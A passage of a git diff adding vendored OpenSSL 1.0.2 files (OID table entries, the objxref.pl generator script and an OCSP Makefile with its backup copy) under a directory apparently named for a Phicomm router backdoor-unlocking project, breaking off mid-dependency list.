+camellia 21		: CAMELLIA-192-ECB		: camellia-192-ecb
+!Cname camellia-192-ofb128
+camellia 23		: CAMELLIA-192-OFB		: camellia-192-ofb
+!Cname camellia-192-cfb128
+camellia 24		: CAMELLIA-192-CFB		: camellia-192-cfb
+
+camellia 41		: CAMELLIA-256-ECB		: camellia-256-ecb
+!Cname camellia-256-ofb128
+camellia 43		: CAMELLIA-256-OFB		: camellia-256-ofb
+!Cname camellia-256-cfb128
+camellia 44		: CAMELLIA-256-CFB		: camellia-256-cfb
+
+# There are no OIDs for these modes...
+
+			: CAMELLIA-128-CFB1		: camellia-128-cfb1
+			: CAMELLIA-192-CFB1		: camellia-192-cfb1
+			: CAMELLIA-256-CFB1		: camellia-256-cfb1
+			: CAMELLIA-128-CFB8		: camellia-128-cfb8
+			: CAMELLIA-192-CFB8		: camellia-192-cfb8
+			: CAMELLIA-256-CFB8		: camellia-256-cfb8
+
+# Definitions for SEED cipher - ECB, CBC, OFB mode
+
+member-body 410 200004  : KISA          : kisa
+kisa 1 3                : SEED-ECB      : seed-ecb
+kisa 1 4                : SEED-CBC      : seed-cbc
+!Cname seed-cfb128
+kisa 1 5                : SEED-CFB      : seed-cfb
+!Cname seed-ofb128
+kisa 1 6                : SEED-OFB      : seed-ofb
+
+# There is no OID that just denotes "HMAC" oddly enough...
+
+			: HMAC				: hmac
+# Nor CMAC either
+			: CMAC				: cmac
+
+# Synthetic composite ciphersuites
+			: RC4-HMAC-MD5			: rc4-hmac-md5
+			: AES-128-CBC-HMAC-SHA1		: aes-128-cbc-hmac-sha1
+			: AES-192-CBC-HMAC-SHA1		: aes-192-cbc-hmac-sha1
+			: AES-256-CBC-HMAC-SHA1		: aes-256-cbc-hmac-sha1
+			: AES-128-CBC-HMAC-SHA256	: aes-128-cbc-hmac-sha256
+			: AES-192-CBC-HMAC-SHA256	: aes-192-cbc-hmac-sha256
+			: AES-256-CBC-HMAC-SHA256	: aes-256-cbc-hmac-sha256
+
+ISO-US 10046 2 1	: dhpublicnumber		: X9.42 DH
+
+# RFC 5639 curve OIDs (see http://www.ietf.org/rfc/rfc5639.txt)
+# versionOne OBJECT IDENTIFIER ::= {
+# iso(1) identifified-organization(3) teletrust(36) algorithm(3)
+# signature-algorithm(3) ecSign(2) ecStdCurvesAndGeneration(8)
+# ellipticCurve(1) 1 }
+1 3 36 3 3 2 8 1 1 1 : brainpoolP160r1
+1 3 36 3 3 2 8 1 1 2 : brainpoolP160t1
+1 3 36 3 3 2 8 1 1 3 : brainpoolP192r1
+1 3 36 3 3 2 8 1 1 4 : brainpoolP192t1
+1 3 36 3 3 2 8 1 1 5 : brainpoolP224r1
+1 3 36 3 3 2 8 1 1 6 : brainpoolP224t1
+1 3 36 3 3 2 8 1 1 7 : brainpoolP256r1
+1 3 36 3 3 2 8 1 1 8 : brainpoolP256t1
+1 3 36 3 3 2 8 1 1 9 : brainpoolP320r1
+1 3 36 3 3 2 8 1 1 10 : brainpoolP320t1
+1 3 36 3 3 2 8 1 1 11 : brainpoolP384r1
+1 3 36 3 3 2 8 1 1 12 : brainpoolP384t1
+1 3 36 3 3 2 8 1 1 13 : brainpoolP512r1
+1 3 36 3 3 2 8 1 1 14 : brainpoolP512t1            
+
+# ECDH schemes from RFC5753
+!Alias x9-63-scheme 1 3 133 16 840 63 0
+!Alias secg-scheme certicom-arc 1
+
+x9-63-scheme 2   : dhSinglePass-stdDH-sha1kdf-scheme
+secg-scheme 11 0 : dhSinglePass-stdDH-sha224kdf-scheme
+secg-scheme 11 1 : dhSinglePass-stdDH-sha256kdf-scheme
+secg-scheme 11 2 : dhSinglePass-stdDH-sha384kdf-scheme
+secg-scheme 11 3 : dhSinglePass-stdDH-sha512kdf-scheme
+
+x9-63-scheme 3   : dhSinglePass-cofactorDH-sha1kdf-scheme
+secg-scheme 14 0 : dhSinglePass-cofactorDH-sha224kdf-scheme
+secg-scheme 14 1 : dhSinglePass-cofactorDH-sha256kdf-scheme
+secg-scheme 14 2 : dhSinglePass-cofactorDH-sha384kdf-scheme
+secg-scheme 14 3 : dhSinglePass-cofactorDH-sha512kdf-scheme
+# NIDs for use with lookup tables.
+                 : dh-std-kdf
+                 : dh-cofactor-kdf
+
+# RFC 6962 Extension OIDs (see http://www.ietf.org/rfc/rfc6962.txt)
+1 3 6 1 4 1 11129 2 4 2	: ct_precert_scts		: CT Precertificate SCTs
+1 3 6 1 4 1 11129 2 4 3	: ct_precert_poison		: CT Precertificate Poison
+1 3 6 1 4 1 11129 2 4 4	: ct_precert_signer		: CT Precertificate Signer
+1 3 6 1 4 1 11129 2 4 5	: ct_cert_scts			: CT Certificate SCTs
+
+# CABForum EV SSL Certificate Guidelines
+# (see https://cabforum.org/extended-validation/)
+# OIDs for Subject Jurisdiction of Incorporation or Registration
+1 3 6 1 4 1 311 60 2 1 1	: jurisdictionL		: jurisdictionLocalityName
+1 3 6 1 4 1 311 60 2 1 2	: jurisdictionST	: jurisdictionStateOrProvinceName
+1 3 6 1 4 1 311 60 2 1 3	: jurisdictionC		: jurisdictionCountryName
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objxref.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objxref.pl
new file mode 100644
index 0000000..833f4ab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/objxref.pl
@@ -0,0 +1,111 @@
+#!/usr/local/bin/perl
+
+use strict;
+
+my %xref_tbl;
+my %oid_tbl;
+
+my ($mac_file, $xref_file) = @ARGV;
+
+open(IN, $mac_file) || die "Can't open $mac_file";
+
+# Read in OID nid values for a lookup table.
+
+while (<IN>)
+	{
+	chomp;
+	my ($name, $num) = /^(\S+)\s+(\S+)$/;
+	$oid_tbl{$name} = $num;
+	}
+close IN;
+
+open(IN, $xref_file) || die "Can't open $xref_file";
+
+my $ln = 1;
+
+while (<IN>)
+	{
+	chomp;
+	s/#.*$//;
+	next if (/^\S*$/);
+	my ($xr, $p1, $p2) = /^(\S+)\s+(\S+)\s+(\S+)/;
+	check_oid($xr);
+	check_oid($p1);
+	check_oid($p2);
+	$xref_tbl{$xr} = [$p1, $p2, $ln];
+	}
+
+my @xrkeys = keys %xref_tbl;
+
+my @srt1 = sort { $oid_tbl{$a} <=> $oid_tbl{$b}} @xrkeys;
+
+my $i;
+for($i = 0; $i <= $#srt1; $i++)
+	{
+	$xref_tbl{$srt1[$i]}[2] = $i;
+	}
+
+my @srt2 = sort
+	{
+	my$ap1 = $oid_tbl{$xref_tbl{$a}[0]};
+	my$bp1 = $oid_tbl{$xref_tbl{$b}[0]};
+	return $ap1 - $bp1 if ($ap1 != $bp1);
+	my$ap2 = $oid_tbl{$xref_tbl{$a}[1]};
+	my$bp2 = $oid_tbl{$xref_tbl{$b}[1]};
+
+	return $ap2 - $bp2;
+	} @xrkeys;
+
+my $pname = $0;
+
+$pname =~ s|^.[^/]/||;
+
+print <<EOF;
+/* AUTOGENERATED BY $pname, DO NOT EDIT */
+
+typedef struct
+	{
+	int sign_id;
+	int hash_id;
+	int pkey_id;
+	} nid_triple;
+
+static const nid_triple sigoid_srt[] =
+	{
+EOF
+
+foreach (@srt1)
+	{
+	my $xr = $_;
+	my ($p1, $p2) = @{$xref_tbl{$_}};
+	print "\t{NID_$xr, NID_$p1, NID_$p2},\n";
+	}
+
+print "\t};";
+print <<EOF;
+
+
+static const nid_triple * const sigoid_srt_xref[] =
+	{
+EOF
+
+foreach (@srt2)
+	{
+	my ($p1, $p2, $x) = @{$xref_tbl{$_}};
+	# If digest or signature algorithm is "undef" then the algorithm
+	# needs special handling and is excluded from the cross reference table.
+	next if $p1 eq "undef" || $p2 eq "undef";
+	print "\t\&sigoid_srt\[$x\],\n";
+	}
+
+print "\t};\n\n";
+
+sub check_oid
+	{
+	my ($chk) = @_;
+	if (!exists $oid_tbl{$chk})
+		{
+		die "Not Found \"$chk\"\n";
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile
new file mode 100644
index 0000000..31a4a3e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile
@@ -0,0 +1,201 @@
+#
+# OpenSSL/ocsp/Makefile
+#
+
+DIR=	ocsp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= ocsp_asn.c ocsp_ext.c ocsp_ht.c ocsp_lib.c ocsp_cl.c \
+	ocsp_srv.c ocsp_prn.c ocsp_vfy.c ocsp_err.c
+
+LIBOBJ= ocsp_asn.o ocsp_ext.o ocsp_ht.o ocsp_lib.o ocsp_cl.o \
+	ocsp_srv.o ocsp_prn.o ocsp_vfy.o ocsp_err.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ocsp.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ocsp_asn.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ocsp_asn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_asn.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+ocsp_asn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_asn.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_asn.o: ../../include/openssl/opensslconf.h
+ocsp_asn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_asn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_asn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_asn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_asn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_asn.o: ocsp_asn.c
+ocsp_cl.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_cl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_cl.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_cl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_cl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_cl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_cl.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_cl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_cl.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_cl.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_cl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_cl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_cl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_cl.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_cl.c
+ocsp_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_err.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_err.o: ../../include/openssl/opensslconf.h
+ocsp_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_err.o: ocsp_err.c
+ocsp_ext.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_ext.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_ext.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_ext.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_ext.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_ext.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_ext.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_ext.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_ext.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_ext.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_ext.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_ext.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_ext.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_ext.c
+ocsp_ht.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_ht.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_ht.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_ht.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_ht.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_ht.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_ht.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_ht.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_ht.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_ht.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_ht.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_ht.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_ht.o: ocsp_ht.c
+ocsp_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_lib.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ocsp_lib.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_lib.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_lib.o: ../../include/openssl/opensslconf.h
+ocsp_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_lib.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_lib.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_lib.c
+ocsp_prn.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_prn.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_prn.o: ../../include/openssl/opensslconf.h
+ocsp_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_prn.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_prn.o: ocsp_prn.c
+ocsp_srv.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_srv.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_srv.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_srv.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_srv.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_srv.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_srv.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_srv.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_srv.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_srv.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_srv.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_srv.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_srv.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_srv.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_srv.c
+ocsp_vfy.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_vfy.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_vfy.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_vfy.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_vfy.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_vfy.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_vfy.o: ../../include/openssl/opensslconf.h
+ocsp_vfy.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_vfy.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_vfy.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_vfy.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_vfy.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_vfy.o: ocsp_vfy.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile.bak
new file mode 100644
index 0000000..31a4a3e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/Makefile.bak
@@ -0,0 +1,201 @@
+#
+# OpenSSL/ocsp/Makefile
+#
+
+DIR=	ocsp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= ocsp_asn.c ocsp_ext.c ocsp_ht.c ocsp_lib.c ocsp_cl.c \
+	ocsp_srv.c ocsp_prn.c ocsp_vfy.c ocsp_err.c
+
+LIBOBJ= ocsp_asn.o ocsp_ext.o ocsp_ht.o ocsp_lib.o ocsp_cl.o \
+	ocsp_srv.o ocsp_prn.o ocsp_vfy.o ocsp_err.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ocsp.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ocsp_asn.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ocsp_asn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_asn.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+ocsp_asn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_asn.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_asn.o: ../../include/openssl/opensslconf.h
+ocsp_asn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_asn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_asn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_asn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_asn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_asn.o: ocsp_asn.c
+ocsp_cl.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_cl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_cl.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_cl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_cl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_cl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_cl.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_cl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_cl.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_cl.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_cl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_cl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_cl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_cl.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_cl.c
+ocsp_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_err.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_err.o: ../../include/openssl/opensslconf.h
+ocsp_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_err.o: ocsp_err.c
+ocsp_ext.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_ext.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_ext.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_ext.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_ext.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_ext.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_ext.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_ext.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_ext.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_ext.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_ext.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_ext.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_ext.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_ext.c
+ocsp_ht.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_ht.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ocsp_ht.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ocsp_ht.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ocsp_ht.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ocsp_ht.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ocsp_ht.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+ocsp_ht.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_ht.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ocsp_ht.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ocsp_ht.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ocsp_ht.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ocsp_ht.o: ocsp_ht.c
+ocsp_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+ocsp_lib.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ocsp_lib.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ocsp_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ocsp_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ocsp_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ocsp_lib.o: ../../include/openssl/objects.h ../../include/openssl/ocsp.h
+ocsp_lib.o: ../../include/openssl/opensslconf.h
+ocsp_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ocsp_lib.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+ocsp_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+ocsp_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ocsp_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ocsp_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ocsp_lib.o: ../../include/openssl/x509v3.h ../cryptlib.h ocsp_lib.c
+ocsp_prn.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ocsp_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
